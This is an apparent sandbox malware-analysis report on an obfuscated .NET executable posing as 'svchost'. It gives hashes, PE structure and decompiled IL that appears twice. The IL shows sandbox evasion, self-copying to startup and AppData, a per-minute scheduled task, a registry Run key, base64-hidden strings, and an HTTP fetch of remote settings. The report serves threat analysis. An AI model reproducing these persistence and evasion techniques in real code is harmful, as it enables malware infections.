Suspicious
Suspect

1cf2f07ea05488bdd4f38cf19e108019

PE Executable
|
MD5: 1cf2f07ea05488bdd4f38cf19e108019
|
Size: 1.19 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
1cf2f07ea05488bdd4f38cf19e108019
Sha1
ec25c5737ced1c19bbaae7110499caf1ac879347
Sha256
7324dc59e2c7c2362de668932d9d38df2263dec910523d0596d1411a4f131d6f
Sha384
8366e20ba7f8dfdb613ba1da68bfaaf9025343ea0a5d5a573d2a71af774006b8be12c41648d830e472c99a8d73814be8
Sha512
9237c065771305a3261316a1a8b08acace999fbd6001c55348c332329c9f098873827c65e29b8a37f36948df6eff8cbd40d271a0a51c9488d5481e642c21bbd1
SSDeep
12288:NRNXqn/F3Nq2jQqMgnCjKlO36nvkk3ANhTzzXOVQtlhMZKCUejXxt/xG3UIUV773:/6HRkNYAsstbxRBM
TLSH
4F455A2878BB90595477FF913DECB9EADDDE2A636509681B1085430B8E12F80EF4393D

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
1cf2f07ea05488bdd4f38cf19e108019
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

microsoft
Full Name

microsoft
EntryPoint

System.Void MTOYBUWfXcKsDaEnGUS.GHIBAPYJMggKYIdZQ::6Pg25KV9BipmzFULHf1L()
Scope Name

microsoft
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

svchost
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

390
Main Method

System.Void MTOYBUWfXcKsDaEnGUS.GHIBAPYJMggKYIdZQ::6Pg25KV9BipmzFULHf1L()
Main IL Instruction Count

275
Main IL

ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Void MTOYBUWfXcKsDaEnGUS.DPLMIBMPOWNUJHTpGhzn::vblbwxCqW3gIK1kMP4Hr() call System.Boolean MTOYBUWfXcKsDaEnGUS.TXZXODV::t3j5iXjBFpXqorw19C49() brtrue IL_001F: ldc.i4.3 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.3 <null> stloc.3 <null> ldc.i4.4 <null> stloc.s V_4 ldloc.3 <null> ldloc.s V_4 add.ovf <null> stloc.s V_5 ldloc.s V_5 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_6 ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL ldloc.s V_6 call System.Void System.IO.File::Copy(System.String,System.String) ldloc.s V_6 newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 ldc.i4 128 callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) leave IL_008F: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_008F: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) stloc.0 <null> ldloc.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL ldloc.1 <null> call System.Void System.IO.File::Copy(System.String,System.String) leave IL_00F2: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_00F2: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr c2NodGFza3MuZXhl call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_11 ldloc.s V_11 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_11 ldc.i4.5 <null> newarr System.String stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr L2NyZWF0ZSAvZiAvc2MgbWludXRlIC9tbyAxIC90biAi call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.1 <null> ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_21 ldc.i4.2 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr IiAvdHIgIg== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_21 ldc.i4.4 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Ig== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_11 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_10 ldloc.s V_10 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave IL_01B1: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_01B1: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_13 call My.MyComputer My.MyProject::Mte8Jqq9EXMOdF6fz90A() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.s V_13 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL ldloc.s V_13 call System.Void System.IO.File::Copy(System.String,System.String) leave IL_024F: ldsfld System.Boolean MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::1SmPsx1FmPYpEjg2CJpu dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_024F: ldsfld System.Boolean MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::1SmPsx1FmPYpEjg2CJpu ldsfld System.Boolean MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::1SmPsx1FmPYpEjg2CJpu brfalse IL_039F: ldnull ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::lt63TwDS3NEsRwu6iMzw call System.Net.WebRequest System.Net.WebRequest::Create(System.String) castclass System.Net.HttpWebRequest stloc.s V_15 ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr R0VU call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_Method(System.String) ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr TW96aWxsYS81LjA= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_UserAgent(System.String) ldloc.s V_15 callvirt System.Net.WebResponse System.Net.HttpWebRequest::GetResponse() castclass System.Net.HttpWebResponse stloc.s V_16 ldloc.s V_16 callvirt System.IO.Stream System.Net.HttpWebResponse::GetResponseStream() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream) stloc.s V_17 ldloc.s V_17 callvirt System.String System.IO.StreamReader::ReadLine() stloc.s V_18 br IL_034C: ldloc.s V_18 ldloc.s V_18 call System.Boolean System.String::IsNullOrWhiteSpace(System.String) brtrue IL_0343: ldloc.s V_17 ldloc.s V_18 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Og== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Boolean System.String::Contains(System.String) brfalse IL_0343: ldloc.s V_17 ldloc.s V_18 ldc.i4.1 <null> newarr System.Char stloc.s V_22 ldloc.s V_22 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_22 ldc.i4.2 <null> callvirt System.String[] System.String::Split(System.Char[],System.Int32) stloc.s V_19 ldloc.s V_19 ldlen <null> conv.ovf.i4 <null> ldc.i4.2 <null> bne.un IL_0343: ldloc.s V_17 ldloc.s V_19 ldc.i4.0 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::eypkH3o5jVxEZlpUSujC ldloc.s V_19 ldc.i4.1 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::WamHSEjgUx14JoJ20jGe ldloc.s V_17 callvirt System.String System.IO.StreamReader::ReadLine() stloc.s V_18 ldloc.s V_18 brtrue IL_02D6: ldloc.s V_18 leave IL_0367: leave IL_037B ldloc.s V_17 brfalse IL_0366: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_037B: leave IL_039F ldloc.s V_16 brfalse IL_037A: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_039F: ldnull dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_20 ldloc.s V_20 callvirt System.String System.Exception::get_Message() call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String) pop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_039F: ldnull ldnull <null> ldftn System.Void MTOYBUWfXcKsDaEnGUS.GHIBAPYJMggKYIdZQ::mOMwOyn5PkQO8LeQVj6H() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Module Name

microsoft
Full Name

microsoft
EntryPoint

System.Void MTOYBUWfXcKsDaEnGUS.GHIBAPYJMggKYIdZQ::6Pg25KV9BipmzFULHf1L()
Scope Name

microsoft
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

svchost
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

390
Main Method

System.Void MTOYBUWfXcKsDaEnGUS.GHIBAPYJMggKYIdZQ::6Pg25KV9BipmzFULHf1L()
Main IL Instruction Count

275
Main IL

ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Void MTOYBUWfXcKsDaEnGUS.DPLMIBMPOWNUJHTpGhzn::vblbwxCqW3gIK1kMP4Hr() call System.Boolean MTOYBUWfXcKsDaEnGUS.TXZXODV::t3j5iXjBFpXqorw19C49() brtrue IL_001F: ldc.i4.3 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.3 <null> stloc.3 <null> ldc.i4.4 <null> stloc.s V_4 ldloc.3 <null> ldloc.s V_4 add.ovf <null> stloc.s V_5 ldloc.s V_5 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_6 ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL ldloc.s V_6 call System.Void System.IO.File::Copy(System.String,System.String) ldloc.s V_6 newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 ldc.i4 128 callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) leave IL_008F: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_008F: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) stloc.0 <null> ldloc.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL ldloc.1 <null> call System.Void System.IO.File::Copy(System.String,System.String) leave IL_00F2: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_00F2: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr c2NodGFza3MuZXhl call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_11 ldloc.s V_11 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_11 ldc.i4.5 <null> newarr System.String stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr L2NyZWF0ZSAvZiAvc2MgbWludXRlIC9tbyAxIC90biAi call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.1 <null> ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_21 ldc.i4.2 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr IiAvdHIgIg== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_21 ldc.i4.4 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Ig== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_11 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_10 ldloc.s V_10 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave IL_01B1: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_01B1: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_13 call My.MyComputer My.MyProject::Mte8Jqq9EXMOdF6fz90A() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.s V_13 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL ldloc.s V_13 call System.Void System.IO.File::Copy(System.String,System.String) leave IL_024F: ldsfld System.Boolean MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::1SmPsx1FmPYpEjg2CJpu dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_024F: ldsfld System.Boolean MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::1SmPsx1FmPYpEjg2CJpu ldsfld System.Boolean MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::1SmPsx1FmPYpEjg2CJpu brfalse IL_039F: ldnull ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::lt63TwDS3NEsRwu6iMzw call System.Net.WebRequest System.Net.WebRequest::Create(System.String) castclass System.Net.HttpWebRequest stloc.s V_15 ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr R0VU call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_Method(System.String) ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr TW96aWxsYS81LjA= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_UserAgent(System.String) ldloc.s V_15 callvirt System.Net.WebResponse System.Net.HttpWebRequest::GetResponse() castclass System.Net.HttpWebResponse stloc.s V_16 ldloc.s V_16 callvirt System.IO.Stream System.Net.HttpWebResponse::GetResponseStream() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream) stloc.s V_17 ldloc.s V_17 callvirt System.String System.IO.StreamReader::ReadLine() stloc.s V_18 br IL_034C: ldloc.s V_18 ldloc.s V_18 call System.Boolean System.String::IsNullOrWhiteSpace(System.String) brtrue IL_0343: ldloc.s V_17 ldloc.s V_18 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Og== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Boolean System.String::Contains(System.String) brfalse IL_0343: ldloc.s V_17 ldloc.s V_18 ldc.i4.1 <null> newarr System.Char stloc.s V_22 ldloc.s V_22 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_22 ldc.i4.2 <null> callvirt System.String[] System.String::Split(System.Char[],System.Int32) stloc.s V_19 ldloc.s V_19 ldlen <null> conv.ovf.i4 <null> ldc.i4.2 <null> bne.un IL_0343: ldloc.s V_17 ldloc.s V_19 ldc.i4.0 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::eypkH3o5jVxEZlpUSujC ldloc.s V_19 ldc.i4.1 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::WamHSEjgUx14JoJ20jGe ldloc.s V_17 callvirt System.String System.IO.StreamReader::ReadLine() stloc.s V_18 ldloc.s V_18 brtrue IL_02D6: ldloc.s V_18 leave IL_0367: leave IL_037B ldloc.s V_17 brfalse IL_0366: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_037B: leave IL_039F ldloc.s V_16 brfalse IL_037A: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_039F: ldnull dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_20 ldloc.s V_20 callvirt System.String System.Exception::get_Message() call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String) pop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_039F: ldnull ldnull <null> ldftn System.Void MTOYBUWfXcKsDaEnGUS.GHIBAPYJMggKYIdZQ::mOMwOyn5PkQO8LeQVj6H() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
1cf2f07ea05488bdd4f38cf19e108019 (1.19 MB)
File Structure
1cf2f07ea05488bdd4f38cf19e108019
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙